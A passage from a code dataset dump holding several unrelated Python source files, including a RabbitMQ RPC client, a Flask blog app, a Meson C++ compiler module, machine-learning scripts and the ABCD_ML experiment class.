os.makedirs(self.base_directory)\n","sub_path":"examples/experiment_template.py","file_name":"experiment_template.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650884717","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# Copyright 2011 Red Hat, Inc.\n# Copyright (c) 2012 Samsung SDS Co., LTD\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom synaps import flags\nfrom synaps.utils import strtime\nfrom synaps import log as logging\nfrom synaps.exception import RpcInvokeException\nimport uuid\n\nimport pika, json\n\nLOG = logging.getLogger(__name__)\nFLAGS = flags.FLAGS\n\nPUT_METRIC_DATA_MSG_ID = 0x0001\nPUT_METRIC_ALARM_MSG_ID = 0x0002\nDISABLE_ALARM_ACTIONS = 0x0003\nENABLE_ALARM_ACTIONS = 0x0004\nDELETE_ALARMS_MSG_ID = 0x0005\nSET_ALARM_STATE_MSG_ID = 0x0006\nCHECK_METRIC_ALARM_MSG_ID = 0x0010 \n\n\nclass RemoteProcedureCall(object):\n def __init__(self):\n self.connect()\n \n def connect(self):\n host = FLAGS.get('rabbit_host')\n port = FLAGS.get('rabbit_port')\n try:\n LOG.info(_(\"connecting to rabbit_host %s %d\") % (host, port))\n\n self.conn = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=FLAGS.get('rabbit_host'),\n port=FLAGS.get('rabbit_port'),\n credentials=pika.PlainCredentials(\n FLAGS.get('rabbit_userid'),\n FLAGS.get('rabbit_password')\n ),\n virtual_host=FLAGS.get('rabbit_virtual_host'),\n )\n )\n \n self.channel = self.conn.channel()\n queue_args = {\"x-ha-policy\" : \"all\" }\n self.channel.queue_declare(queue='metric_queue', durable=True,\n arguments=queue_args)\n except Exception as e:\n raise RpcInvokeException()\n \n def send_msg(self, message_id, body):\n \"\"\"\n \n \n Args:\n message_id: int\n ex) PUT_METRIC_DATA_MSG_ID (0x0001)\n PUT_METRIC_ALARM_MSG_ID (0x0002)\n ...\n body: dict object (will be converted into json format)\n \n \"\"\"\n if type(message_id) is not int:\n raise RpcInvokeException()\n \n if not self.conn.is_open:\n self.connect()\n\n message_uuid = str(uuid.uuid4()) \n body.setdefault('message_id', message_id)\n body.setdefault('message_uuid', message_uuid)\n \n self.channel.basic_publish(\n exchange='', routing_key='metric_queue', body=json.dumps(body),\n properties=pika.BasicProperties(delivery_mode=2)\n )\n \n LOG.info(_(\"send_msg - id(%03d), %s\") % (message_id, message_uuid))\n LOG.debug(_(\"send_msg - body(%s)\") % str(body))\n","sub_path":"synaps-api/synaps/rpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118433031","text":"import time\n\nfrom flask import Flask\nfrom flask_admin import Admin\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_babelex import Babel\n\nimport config\nfrom model import db\nfrom model.blog import Blog\nfrom model.reply import Reply\nfrom model.user import User\nfrom route import csrf\nfrom route.routes_index import main as index_routes\nfrom route.routes_detail import main as detail_routes\n\n\ndef formatted_time(input):\n \"\"\"\n Jinja2 filter\n :param input: timestamp\n :return: formatted time\n \"\"\"\n\n time_format = r'%Y/%m/%d'\n localtime = time.localtime(int(input))\n formatted = time.strftime(time_format, localtime)\n return formatted\n\n\ndef time_count(input):\n \"\"\"\n Jinja2 filter\n :param input: timestamp\n :return: generated current time minus input and formatted\n \"\"\"\n num = int(time.time())-input\n if num < 60:\n return '{} 秒'.format(num)\n elif 60 < num < 3600:\n return '{} 分钟'.format(num//60)\n elif 3600 < num < 86400:\n return '{} 小时'.format(num//3600)\n else:\n return '{} 天'.format(num//86400)\n\n\ndef current_app():\n \"\"\"\n Flask main enter\n :return: Flask app\n \"\"\"\n app = Flask(__name__)\n\n app.secret_key = config.secret_key\n\n 
app.config['WTF_CSRF_SECRET_KEY'] = config.csrf_key\n app.config['SQLALCHEMY_DATABASE_URI'] = config.db_url\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n app.add_template_filter(formatted_time)\n app.add_template_filter(time_count)\n\n db.init_app(app)\n csrf.init_app(app)\n\n register_routes(app)\n return app\n\n\ndef register_routes(app):\n \"\"\"\n Register routes and add prefix\n :param app: Flask app\n :return: Flask app\n \"\"\"\n app.register_blueprint(index_routes)\n app.register_blueprint(detail_routes, url_prefix='/blog')\n\n\nif __name__ == '__main__':\n app = current_app()\n\n app.config['TEMPLATE_AUTO_RELOAD'] = True\n app.jinja_env.auto_reload = True\n\n app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n # 本地化,admin后台中文\n babel = Babel(app)\n app.config['BABEL_DEFAULT_LOCALE'] = 'zh_CN'\n\n admin = Admin(app, name=u'管理后台', template_mode='bootstrap3')\n admin.add_view(ModelView(User, db.session))\n admin.add_view(ModelView(Blog, db.session))\n admin.add_view(ModelView(Reply, db.session))\n\n config = dict(\n host='localhost',\n port=3000,\n debug=True\n )\n\n app.run(**config)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60437745","text":"\ndef solve(string,n,z):\n if len(string) == 1 and string[0] == \"+\" :\n print(\"Case #\", z+1, \": \",n , sep = '');\n return n;\n if string[len(string)-1] == \"+\" :\n solve(string[0:len(string)-1],n,z);\n else :\n tempString = [];\n for j in string:\n tempString.append(j);\n for i in range(len(tempString)) :\n if tempString[i] == \"+\" :\n tempString[i] = \"-\";\n else :\n tempString[i] = \"+\";\n string = ''.join(tempString);\n \n solve(string,n+1,z);\n\t\t\ncases = int(input());\n\nfor i in range(cases) :\n string = input();\n if len(string) == 1 :\n \tif string[0] == \"-\" :\n \t\tprint(\"Case #\", i+1, \": 1\", sep = '');\n \telse :\n \t\tprint(\"Case #\", i+1, \": 0\", sep = '')\n \tcontinue;\n #Check if all values are same\n if string == \"-\" * len(string) :\n \tprint(\"Case #\", i+1, \": 1\", sep = '');\n \tcontinue;\n elif string == \"+\" * len(string) :\n \tprint(\"Case #\", i+1, \": 0\", sep = '');\n \tcontinue;\n #Check if all values except last are same\n if string[len(string)-1] == \"-\" and string[0:len(string)-2] == \"+\" * (len(string)-2) :\n \tprint(\"Case #\", i+1, \": 2\", sep = '');\n \tcontinue;\n elif string[len(string)-1] == \"+\" and string[0:len(string)-2] == \"-\" * (len(string)-2) :\n \tprint(\"Case #\", i+1, \": 1\", sep = '');\n \tcontinue;\n solve(string,0,i);\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_Marmik_Revenge Of PanCakes.py","file_name":"16_0_2_Marmik_Revenge Of PanCakes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425817546","text":"# Import necessary libraries\nimport pandas as pd\nfrom sklearn import model_selection\nfrom model import TitanicModel\nfrom tensorflow import keras\nfrom keras.utils import to_categorical\n\ndef load_and_prep_data(data_path, isTrainingSet):\n\n # Load dataset\n X_train_orig = pd.read_csv(data_path)\n\n # View dataset\n print(X_train_orig.head())\n\n # Separate the Y i.e output from the training dataset only.\n Y_train_orig = None\n if isTrainingSet:\n Y_train_orig = X_train_orig['Survived']\n #print(Y_train_orig.head())\n # Drop unnecessary columns\n dropCols = ['PassengerId', 'Survived', 'Name', 
'Ticket', 'Cabin']\n else:\n dropCols = ['PassengerId', 'Name', 'Ticket', 'Cabin']\n X_train = X_train_orig.drop(dropCols, axis=1)\n #print(X_train.head())\n #print(X_train.info())\n\n # Separate numerical and categorical features\n num_feat = X_train.select_dtypes('number').columns.values\n cat_feat = X_train.select_dtypes('object').columns.values\n X_num = X_train[num_feat]\n\n # Take age and category in range 1-3\n X_num.loc[ X_num['Fare'] <= 7.91, 'Fare'] = 0\n X_num.loc[(X_num['Fare'] > 7.91) & (X_num['Fare'] <= 14.454), 'Fare'] = 1\n X_num.loc[(X_num['Fare'] > 14.454) & (X_num['Fare'] <= 31), 'Fare'] = 2\n X_num.loc[ X_num['Fare'] > 31, 'Fare'] = 3\n #X_num['Fare'] = X_num['Fare'].astype(int)\n\n X_num.loc[ X_num['Age'] <= 16, 'Age'] = 0\n X_num.loc[(X_num['Age'] > 16) & (X_num['Age'] <= 32), 'Age'] = 1\n X_num.loc[(X_num['Age'] > 32) & (X_num['Age'] <= 48), 'Age'] = 2\n X_num.loc[(X_num['Age'] > 48) & (X_num['Age'] <= 64), 'Age'] = 3\n X_num.loc[ X_num['Age'] > 64, 'Age'] = 4\n #X_num['Age'] = X_num['Age'].astype(int)\n X_cat = X_train[cat_feat]\n\n # Data Augmentation\n \n\n # Normalize numeric features\n X_num_normalized = (X_num - X_num.mean()) / X_num.std()\n X_num_normalized = X_num_normalized.fillna(X_num_normalized.mean())\n\n #print(X_num_normalized.head())\n\n # Convert categorical features to one hot\n X_cat = pd.get_dummies(X_cat)\n #print(X_cat.head())\n\n # Concatenate X_num and X_concat\n X = pd.concat([X_num, X_cat], axis=1)\n print(X.head())\n\n Y = list()\n # Do the same for outputs Y\n if Y_train_orig is not None:\n Y = Y_train_orig.fillna(0)\n #print(Y.describe())\n\n return X,Y\n\ndef split_training_data(X, Y):\n X_train, X_test, Y_train, Y_test = model_selection.train_test_split(X, Y, random_state=0)\n return X_train, X_test, Y_train, Y_test\n\ndef main():\n relPath = 'C:/Users/himan/Documents/GitHub/Deep-Learning-Projects/Titanic - Machine Learning from Disaster/dataset'\n trainDataPath = relPath + '/train.csv'\n testDataPath = relPath + '/test.csv'\n \n print('Preparing Training Data')\n X, Y = load_and_prep_data(trainDataPath, True)\n print('Preparing unseen Test Data')\n X_unseen_test, _ = load_and_prep_data(testDataPath, False)\n\n #Split the train data into train and test data for your cross validation\n X_train, X_test, Y_train, Y_test = split_training_data(X,Y)\n\n model = TitanicModel()\n # Convert Y to one hot labels\n Y_train = to_categorical(Y_train)\n Y_test = to_categorical(Y_test)\n\n # Convert dataframe to numpy array\n X_train = X_train.values\n X_test = X_test.values\n \n print('Shape of training data ' + str(X_train.shape))\n print('Shape of training labels ' + str(Y_train.shape))\n \n # Reshape Y_train and Y_test to (N,1)\n #Y_train = Y_train.values.reshape(len(Y_train), 1)\n #Y_test = Y_test.values.reshape((len(Y_test), 1))\n\n print('Shape of test data ' + str(X_test.shape))\n print('Shape of test labels' + str(Y_test.shape))\n\n # Convert unseen test examples into np array\n X_unseen_test = X_unseen_test.values\n \n # Train the model\n trained_model = model.train_with_keras_model(X_train, Y_train, X_test, Y_test, 100, 512)\n #trained_model = model.train_params(X_train.T, Y_train, X_test.T, Y_test, 0.003, 300, 512, True)\n \n # Evaluation on test data\n #pred = trained_model.predict(X_unseen_test)\n #print(pred)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Titanic - Machine Learning from 
Disaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37285184","text":"import pandas as pd\nimport math\nimport numpy \n\nfile_to_read = input(\"type the file you want to read here: \")\n\nread = pd.read_csv(file_to_read)\nangle_calced = numpy.arctan2(read[\"Tangent Y\"], read[\"Tangent X\"])\n\ncombined_output = []\nfor index in range(len(read[\"X\"])):\n x_gen = ((read[\"X\"][index]) - (read[\"X\"][0]))\n y_gen = ((read[\"Y\"][index]) - (read[\"Y\"][0]))\n angle_gen = numpy.rad2deg(angle_calced[index])\n\n x_val = numpy.round(x_gen, 3)\n y_val = numpy.round(y_gen, 3)\n angle = numpy.round(angle_gen, 3)\n\n combined_output.append((x_val, y_val, angle))\n\n print(\"new Pose2d(\" + str(x_val) + \"d, \" + str(y_val) + \"d, \" + \"Rotation2d.fromDegrees(\" + str(angle) + \"d\" \")),\")\n\nnumpy.set_printoptions(suppress=True, precision=3)\n# print(\"points relative to 0: \")\n# print(numpy.array(combined_output))\n","sub_path":"scripts/pointgen.py","file_name":"pointgen.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645055902","text":"# Copyright 2012-2017 The Meson development team\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os.path\n\nfrom .. import mlog\nfrom .. import coredata\nfrom ..mesonlib import version_compare\n\nfrom .c import CCompiler, VisualStudioCCompiler\nfrom .compilers import (\n GCC_MINGW,\n gnu_winlibs,\n msvc_winlibs,\n ClangCompiler,\n GnuCompiler,\n IntelCompiler,\n)\n\nclass CPPCompiler(CCompiler):\n def __init__(self, exelist, version, is_cross, exe_wrap, **kwargs):\n # If a child ObjCPP class has already set it, don't set it ourselves\n if not hasattr(self, 'language'):\n self.language = 'cpp'\n CCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n\n def get_display_language(self):\n return 'C++'\n\n def get_no_stdinc_args(self):\n return ['-nostdinc++']\n\n def sanity_check(self, work_dir, environment):\n code = 'class breakCCompiler;int main(int argc, char **argv) { return 0; }\\n'\n return self.sanity_check_impl(work_dir, environment, 'sanitycheckcpp.cc', code)\n\n def get_compiler_check_args(self):\n # -fpermissive allows non-conforming code to compile which is necessary\n # for many C++ checks. 
Particularly, the has_header_symbol check is\n # too strict without this and always fails.\n return super().get_compiler_check_args() + ['-fpermissive']\n\n def has_header_symbol(self, hname, symbol, prefix, env, extra_args=None, dependencies=None):\n # Check if it's a C-like symbol\n if super().has_header_symbol(hname, symbol, prefix, env, extra_args, dependencies):\n return True\n # Check if it's a class or a template\n if extra_args is None:\n extra_args = []\n fargs = {'prefix': prefix, 'header': hname, 'symbol': symbol}\n t = '''{prefix}\n #include <{header}>\n using {symbol};\n int main () {{ return 0; }}'''\n return self.compiles(t.format(**fargs), env, extra_args, dependencies)\n\n\nclass ClangCPPCompiler(ClangCompiler, CPPCompiler):\n def __init__(self, exelist, version, cltype, is_cross, exe_wrapper=None, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrapper, **kwargs)\n ClangCompiler.__init__(self, cltype)\n default_warn_args = ['-Wall', '-Winvalid-pch', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n return {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none', 'c++98', 'c++03', 'c++11', 'c++14', 'c++17', 'c++1z',\n 'gnu++11', 'gnu++14', 'gnu++17', 'gnu++1z'],\n 'none')}\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n return args\n\n def get_option_link_args(self, options):\n return []\n\n\nclass GnuCPPCompiler(GnuCompiler, CPPCompiler):\n def __init__(self, exelist, version, gcc_type, is_cross, exe_wrap, defines, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n GnuCompiler.__init__(self, gcc_type, defines)\n default_warn_args = ['-Wall', '-Winvalid-pch', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n opts = {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none', 'c++98', 'c++03', 'c++11', 'c++14', 'c++17', 'c++1z',\n 'gnu++03', 'gnu++11', 'gnu++14', 'gnu++17', 'gnu++1z'],\n 'none'),\n 'cpp_debugstl': coredata.UserBooleanOption('cpp_debugstl',\n 'STL debug mode',\n False)}\n if self.gcc_type == GCC_MINGW:\n opts.update({\n 'cpp_winlibs': coredata.UserArrayOption('cpp_winlibs', 'Standard Win libraries to link against',\n gnu_winlibs), })\n return opts\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n if options['cpp_debugstl'].value:\n args.append('-D_GLIBCXX_DEBUG=1')\n return args\n\n def get_option_link_args(self, options):\n if self.gcc_type == GCC_MINGW:\n return options['cpp_winlibs'].value[:]\n return []\n\n def get_pch_use_args(self, pch_dir, header):\n return ['-fpch-preprocess', '-include', os.path.basename(header)]\n\n\nclass IntelCPPCompiler(IntelCompiler, CPPCompiler):\n def __init__(self, exelist, version, icc_type, is_cross, exe_wrap, **kwargs):\n CPPCompiler.__init__(self, exelist, version, is_cross, exe_wrap, **kwargs)\n IntelCompiler.__init__(self, icc_type)\n self.lang_header = 'c++-header'\n default_warn_args = ['-Wall', '-w3', '-diag-disable:remark',\n '-Wpch-messages', '-Wnon-virtual-dtor']\n self.warn_args = {'1': default_warn_args,\n '2': 
default_warn_args + ['-Wextra'],\n '3': default_warn_args + ['-Wextra', '-Wpedantic']}\n\n def get_options(self):\n c_stds = []\n g_stds = ['gnu++98']\n if version_compare(self.version, '>=15.0.0'):\n c_stds += ['c++11', 'c++14']\n g_stds += ['gnu++11']\n if version_compare(self.version, '>=16.0.0'):\n c_stds += ['c++17']\n if version_compare(self.version, '>=17.0.0'):\n g_stds += ['gnu++14']\n opts = {'cpp_std': coredata.UserComboOption('cpp_std', 'C++ language standard to use',\n ['none'] + c_stds + g_stds,\n 'none'),\n 'cpp_debugstl': coredata.UserBooleanOption('cpp_debugstl',\n 'STL debug mode',\n False)}\n return opts\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_std']\n if std.value != 'none':\n args.append('-std=' + std.value)\n if options['cpp_debugstl'].value:\n args.append('-D_GLIBCXX_DEBUG=1')\n return args\n\n def get_option_link_args(self, options):\n return []\n\n def has_multi_arguments(self, args, env):\n for arg in args:\n if arg.startswith('-Wl,'):\n mlog.warning('''{} looks like a linker argument, but has_argument\nand other similar methods only support checking compiler arguments.\nUsing them to check linker arguments are never supported, and results\nare likely to be wrong regardless of the compiler you are using.\n'''.format(arg))\n return super().has_multi_arguments(args + ['-diag-error', '10006'], env)\n\n\nclass VisualStudioCPPCompiler(VisualStudioCCompiler, CPPCompiler):\n def __init__(self, exelist, version, is_cross, exe_wrap, is_64):\n self.language = 'cpp'\n VisualStudioCCompiler.__init__(self, exelist, version, is_cross, exe_wrap, is_64)\n self.base_options = ['b_pch'] # FIXME add lto, pgo and the like\n\n def get_options(self):\n return {'cpp_eh': coredata.UserComboOption('cpp_eh',\n 'C++ exception handling type.',\n ['none', 'a', 's', 'sc'],\n 'sc'),\n 'cpp_winlibs': coredata.UserArrayOption('cpp_winlibs',\n 'Windows libs to link against.',\n msvc_winlibs)\n }\n\n def get_option_compile_args(self, options):\n args = []\n std = options['cpp_eh']\n if std.value != 'none':\n args.append('/EH' + std.value)\n return args\n\n def get_option_link_args(self, options):\n return options['cpp_winlibs'].value[:]\n\n def get_compiler_check_args(self):\n # Visual Studio C++ compiler doesn't support -fpermissive,\n # so just use the plain C args.\n return super(VisualStudioCCompiler, self).get_compiler_check_args()\n","sub_path":"mesonbuild/compilers/cpp.py","file_name":"cpp.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71759912","text":"from PIL import Image\nimport os.path, os\n\nimage_ctype= {'png': \"image/png\",\n 'jpg': \"image/jpeg\",\n 'jpeg': \"image/jpeg\"}\n\ndef save_image(dir, sha1, ext, data):\n fname = \"{0}.{1}\".format(sha1, ext)\n fout = open(os.path.join(dir, fname), 'wb')\n fout.write(data)\n fout.close()\n return fname\n\ndef move_image(fr, to):\n os.rename(fr, to)\n\ndef save_thumbnail(in_path, dir, sha1, prefix, max_width=1024, max_height=1024):\n size = (max_width, max_height)\n im = Image.open(in_path)\n im.thumbnail(size, Image.ANTIALIAS)\n fname = \"{0}_{1}.jpg\".format(prefix, sha1)\n im.save(os.path.join(dir, fname), \"JPEG\", quality=95)\n return fname\n\ndef get_image_size(path):\n im = Image.open(path)\n size = im.size\n return 
size","sub_path":"KPDB/src/imageutil.py","file_name":"imageutil.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334449693","text":"\"\"\"\nABCD_ML.py\n====================================\nThe main project class.\n\"\"\"\nimport pandas as pd\nimport shutil\nimport os\nimport pickle as pkl\n\nfrom ..helpers.Docstring_Helpers import get_new_docstring\n# from ..helpers.Params_Classes import ML_Params\nfrom ..helpers.CV import CV\n\n\ndef Load(loc, exp_name='default', log_dr='default', existing_log='default',\n verbose='default', notebook='default', random_state='default'):\n '''\n This function is designed to load in a saved previously created\n ABCD_ML object.\n\n See :func:`Save ` for saving an object.\n See :func:`Init ` for the\n rest of changable param descriptions, e.g., log_dr, existing_log, ect...\n\n Parameters\n ----------\n loc : str or Path\n\n A path/str to a saved ABCD_ML object,\n (One saved with :func:`Save `), then that object will be\n loaded. Notably, if any additional params are passed along\n with it, e.g., exp_name, notebook, ect... they will override\n the saved values with the newly passed values.\n If left as 'default', all params will be set to the loaded value,\n though see the warning below.\n\n .. WARNING::\n The exp_name or log_dr may need to be changed, especially\n in the case where the object is being loaded in a new\n location or enviroment from where the original was created,\n as it will by default try to create logs with the saved path\n information as the original.\n\n You can only change exp_name, log_dr, existing_log, verbose,\n notebook and random_state when loading a new object, for the\n remaining params, even if a value is passed, it will not be\n applied. 
If the user really wishes to change one of these params,\n they can change it manually via self.name_of_param = whatever.\n '''\n\n with open(loc, 'rb') as f:\n ML = pkl.load(f)\n\n if exp_name != 'default':\n ML.exp_name = exp_name\n if log_dr != 'default':\n ML.log_dr = log_dr\n if existing_log != 'default':\n ML.existing_log = existing_log\n if verbose != 'default':\n ML.verbose = verbose\n\n ML._init_logs()\n\n if notebook != 'default':\n ML.notebook = notebook\n if random_state != 'default':\n ML.random_state = random_state\n\n ML._print('ABCD_ML object loaded from save!')\n return ML\n\n\nclass ABCD_ML():\n\n def __init__(self, exp_name='My_ML_Exp', log_dr='', existing_log='append',\n verbose=True, notebook=True,\n use_abcd_subject_ids=False,\n low_memory_mode=False, strat_u_name='_Strat',\n random_state=534, n_jobs=1, dpi=100, mp_context='spawn'):\n '''Main class used within ABCD_ML for interfacing with Data Loading\n and Modeling / Other funcationality.\n\n Parameters\n ----------\n exp_name : str, optional\n The name of this experimental run,\n used explicitly in saving logs, and figures, where the passed\n `exp_name` is used as the name of the log folder.\n If log_dr is not set to None,\n (if not None then saves logs and figures)\n then a folder is created within the log dr\n with the exp_name.\n\n ::\n\n default = 'My_ML_Exp'\n\n log_dr : str, Path or None, optional\n The directory in which to store logs...\n If set to None, then will not save any logs!\n If set to empty str, will save in the current dr.\n\n ::\n\n default = ''\n\n existing_log : {'new', 'append', 'overwrite'}, optional\n This parameter dictates different choices for when\n an a folder with exp_name already exists in the specified\n log_dr.\n\n These choices are:\n\n - 'new'\n If the log folder already exists, then\n just increment `exp_name` until a free name is found,\n and use that as the log folder / `exp_name`.\n\n - 'append'\n If existing_log is 'append' then log entries\n and new figures will be added to the existing folder.\n\n - 'overwrite'\n If existing_log is 'overwrite', then the existing\n log folder with the same exp_name will be cleared\n upon __init__.\n\n ::\n\n default = 'append'\n\n verbose: bool, optional\n If `verbose` is set to True, the ABCD_ML object\n will print output, diagnostic and more general, directly\n to std out. If set to False, no output will be printed, though\n output will still be recorded within the logs assuming log_dr is not None.\n\n ::\n\n default = True\n\n notebook : bool, optional\n If True, then assumes the user is running\n the code in an interactive jupyter notebook. 
\n In this case, certain features will either be enabled or disabled,\n e.g., type of progress bar.\n\n ::\n\n default = Trues\n\n use_abcd_subject_ids : bool, optional\n Flag to determine the usage of ABCD speficic 'default'\n subject id behavior.\n If set to True, this will convert input NDAR subject ids\n into upper case, with prepended NDAR - type format.\n If set to False, then all input subject names must be entered\n explicitly the same, no preprocessing will be done on them.\n\n ::\n\n default = False\n\n low_memory_mode : bool, optional\n This parameter dictates behavior around loading in data,\n specifically,\n If set to True, individual dataframes self.data, self.covars ect...\n will be deleted from memory as soon as modeling begins.\n This parameter also controls the pandas read_csv behavior,\n which also has a low_memory flag.\n\n ::\n\n default = False\n\n strat_u_name : str, optional\n A unique str identifier to be appended to every loaded\n strat value (to keep them seperate from covars and data).\n\n You should only need to change or ever worry about this in\n the case that one of your input variables happens to have the\n default value of '_Strat' in it...\n\n ::\n\n default = '_Strat'\n\n random_state : int, RandomState instance or None, optional\n The default random state, either as int for a specific seed,\n or if None then the random seed is set by np.random.\n This parameters if set will be the default random_state class-wide,\n so any place random_state is left to default, unless a different\n default is set (e.g. default load value or default ML value) this\n random state will be used.\n\n ::\n\n default = 534\n\n n_jobs : int, optional\n The default number of jobs / processors to use (if avaliable) where\n ever avaliable class-wide across ABCD_ML.\n\n ::\n\n default = 1\n\n dpi : int, optional\n The default dpi in which to save any automatically saved fiugres\n with.\n Where this parameter can also be set to specific values\n for specific plots.\n\n ::\n\n default = 1\n\n mp_context : {None, 'fork', 'spawn'}, optional\n When a hyper-parameter search is launched, there are different\n ways through python that the multi-processing can be launched\n (assuming n_jobs > 1). 
Occassionally some choices can lead to\n odd errors.\n\n ::\n\n default = 'spawn'\n '''\n # Load logging class params\n self.exp_name = exp_name\n self.log_dr = log_dr\n self.existing_log = existing_log\n self.verbose = verbose\n\n self._init_logs()\n\n self._print('exp_name =', self.exp_name)\n self._print('log_dr =', self.log_dr)\n self._print('existing_log =', self.existing_log)\n self._print('verbose =', self.verbose)\n self._print('exp log dr setup at:', self.exp_log_dr)\n self._print('log file at:', self.log_file)\n\n # Set rest of class params\n self.notebook = notebook\n self.use_abcd_subject_ids = use_abcd_subject_ids\n self.low_memory_mode = low_memory_mode\n self.strat_u_name = strat_u_name\n self.random_state = random_state\n self.n_jobs = n_jobs\n self.dpi = dpi\n self.mp_context = mp_context\n\n self._print('Default params set:')\n self._print('notebook =', self.notebook)\n self._print('use_abcd_subject_ids =', self.use_abcd_subject_ids)\n self._print('low memory mode =', self.low_memory_mode)\n self._print('strat_u_name =', self.strat_u_name)\n self._print('random state =', self.random_state)\n self._print('n_jobs =', self.n_jobs)\n self._print('dpi =', self.dpi)\n self._print('mp_context =', self.mp_context)\n\n # Initialze various variables\n self.name_map, self.exclusions, self.inclusions = {}, set(), set()\n self.data, self.covars = pd.DataFrame(), pd.DataFrame()\n self.targets, self.strat = pd.DataFrame(), pd.DataFrame()\n\n # Dict objects to hold encoders\n self.covars_encoders = {}\n self.targets_encoders = {}\n self.strat_encoders = {}\n\n # Class values to be set later\n self.all_data = None\n self.targets_keys = []\n\n # Stores the gloabl train/test split\n self.train_subjects, self.test_subjects = None, None\n\n # CV by default is just random splits\n self.CV = CV()\n\n # Store default dicts as init empty\n self.default_load_params, self.default_ML_verbosity = {}, {}\n\n # Scores are saved after each eval or test run\n self.eval_scores, self.test_scores = {}, {}\n\n self.subject_id = 'src_subject_id'\n\n self.last_run_name = None\n self.last_subjects_to_use_names = None\n\n self.file_mapping = {}\n self.data_file_keys = []\n\n self._print('ABCD_ML object initialized')\n\n def Save(self, loc, low_memory=False):\n '''This class method is used to save an existing ABCD_ML\n object for further use.\n\n Parameters\n ----------\n loc : str or Path\n The location in which the pickle of the ABCD_ML object\n should be saved! This is the same loc which should be\n passed to :func:`Load ` in order to\n re-load the object.\n\n low_memory : bool, optional\n If this parameter is set to True, then self.data,\n self.targets, self.covars, self.strat will be deleted\n before saving. The assumption for the param to be used is\n that self.all_data has already been created, and therefore\n the individual dataframes with data, covars ect... 
can safely\n be deleted as the user will not need to work with them directly\n any more.\n\n In addition, self.Model_Pipeline (which contains\n information about the last run Evaluate or Test call) will be\n deleted.\n\n ::\n\n default = False\n '''\n\n if low_memory:\n self.data, self.covars = pd.DataFrame(), pd.DataFrame()\n self.targets, self.strat = pd.DataFrame(), pd.DataFrame()\n\n try:\n del self.Model_Pipeline\n except AttributeError:\n pass\n\n with open(loc, 'wb') as f:\n pkl.dump(self, f)\n\n def _init_logs(self):\n\n if self.log_dr is not None:\n\n if self.log_dr == '':\n self.log_dr = os.getcwd()\n\n # Ensure log_dr exists, if not make it\n os.makedirs(self.log_dr, exist_ok=True)\n\n # Get exp_log_dr name\n self.exp_log_dr = os.path.join(self.log_dr, self.exp_name)\n\n if os.path.isdir(self.exp_log_dr):\n\n if self.existing_log == 'new':\n\n cnt = 1\n while os.path.isdir(self.exp_log_dr +\n '(' + str(cnt) + ')'):\n cnt += 1\n\n self.exp_log_dr += '(' + str(cnt) + ')'\n\n # If overwrite, delete everything, then make new blank\n elif self.existing_log == 'overwrite':\n shutil.rmtree(self.exp_log_dr)\n\n # Make the new dr\n if self.existing_log != 'append':\n os.mkdir(self.exp_log_dr)\n\n # If the dr doesn't already exist, regardless of existing log\n # Just make new dr.\n else:\n os.mkdir(self.exp_log_dr)\n\n # 